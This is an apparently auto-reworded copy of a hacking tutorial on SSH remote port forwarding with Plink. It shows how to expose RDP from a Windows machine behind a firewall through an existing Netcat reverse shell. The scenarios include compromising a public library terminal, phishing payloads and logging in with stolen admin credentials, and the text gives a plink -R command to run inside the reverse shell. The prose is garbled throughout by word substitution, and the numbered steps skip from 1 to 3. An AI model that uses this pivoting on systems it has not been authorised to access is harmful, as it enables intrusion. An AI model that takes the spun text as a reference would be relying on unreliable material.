Local port forwarding will be Great when you want to use SSH to pivot into a non-routable network. nevertheless if you want to access services on a network when you can’t configure port-forwarding on a router in addition to also don’t have VPN access to the network, remote port forwarding will be the way to go.
Remote port forwarding excels in situations where you want access to a service on an internal network in addition to also have gained control of a machine on in which network via a reverse shell of some kind. Whether you’re a pentester or system admin, This kind of will be a Great thing to know about.
For example, let’s say you compromise a public terminal within the local library in addition to also get some credentials. You install a persistent reverse shell of some sort, which communicates back to your machine, nevertheless you don’t have access to some other services on the machine. The victim machine might have an SQL instance configured on localhost only in which you want access to, or maybe you want to access the remote desktop. Maybe the network will be hosting some sort of admin panel you’d like to poke around in. Whatever This kind of will be you want, a compromised host in addition to also SSH will get you in.
Remote port forwarding isn’t only for malicious scenarios. You can use This kind of to punch a temporary hole out of a network to use work services at home, though in which may be frowned upon by your security team.
Another excellent usage will be in phishing campaigns where a user has executed your payload, in addition to also you only have a reverse shell connection back. After a bit of information gathering, then privilege escalation, you gather the credentials for the administrative user in addition to also wish to use those on another service on the compromised machine.
In This kind of article, we’ll be using SSH to access the remote desktop on a host located behind a firewall in an internal network — all without modifying the port forwarding rules on the gateway!
The shell will be a Netcat connection running cmd.exe. The user “bob” will be not a privileged user. Through prior information gathering, I know in which the user “barrow” will be a privileged user, in addition to also I also know in which This kind of machine features a remote desktop connection available.
This kind of might be excellent to log into This kind of machine via a remote desktop as an administrative user, nevertheless This kind of will be non-routable to my machine. Our compromised machine will be behind a router, with an internal IP address, in addition to also I don’t have access to the internal network, except via the internal host.
I can use the reverse shell to interact with the compromised host, nevertheless if I attempt to connect to a remote desktop, the IP address will be invalid. If I use the public-facing IP address, I will be connecting to a router which will just drop my packets. Since I don’t have an SSH server on This kind of network in which I can pivot with, I’ll have to use Plink to forward the remote desktop service to my attacking machine.
Step 1: Install Plink
Plink will be a Windows command line SSH client. This kind of will be included with Kali Linux within the /usr/share/windows-binaries/ directory. This kind of can also be downloaded via the developer (look for the plink.exe file).
Using my Netcat shell in addition to also plink.exe, I set up a remote port forward to my attacking machine via my victim machine by typing the following into the reverse shell I have established via my victim machine.
plink attackingMachine -R 4000:127.0.0.1:3389
The syntax will be similar to SSH. Using the -R option tells Plink to connect to the attacking machine in addition to also bind a channel on port 4000 (I arbitrarily selected port 4000 — you can select any port). The next portion in between the colons defines what service will be served to port 4000 on the attacking machine. In This kind of case, the victim machine’s port 3389. Once This kind of command will be entered, I will log in with my credentials to my attacking machine. today, my attacking machine has access to the remote desktop service on the victim machine on my localhost port 4000.
If you’re paying attention, you may have noticed in which I used the localhost address on the victim machine. This kind of can be useful for port forwarding services in which are generally constrained to localhost access only, such as mySQL.
Step 3: Log into a Remote Desktop
With This kind of running on my Netcat shell, I connect to my victim machine’s remote desktop service using the rdesktop command. The following command uses the remote desktop protocol to connect to localhost port 4000 where my victim machine will be forwarding its local port 3389.
All in which’s left to do will be use a known credential to log into Windows, either phished or gained via privilege escalation. via here, I have full administrative access to the system, despite the system’s gateway dropping all inbound connection requests. I also retained my initial shell connection, which will be always important to me. Shells can be a lot easier to lose than they are to get back.
SSH will be an excellent tool for pivoting in networks, nevertheless This kind of’s not limited to penetration testing. Remote port forwarding can provide you access to services on a machine in which might normally be inaccessible. This kind of can be useful if you want to share your services with networks in which normally might not be able to reach them. For example, if you need to temporarily connect to a service at work via your home nevertheless the firewall will be dropping all inbound packets. In some cases, setting up a reverse SSH tunnel will be easier than port forwarding a consumer-grade router.
If you have any questions or comments, feel free to post. You can also reach me on Twitter @0xBarrow. in addition to also as always, follow Null Byte on social media to stay up to date on all of the greatest hacking guides on the web.
Don’t Miss: How to Use Pupy, a Remote Access Tool for Linux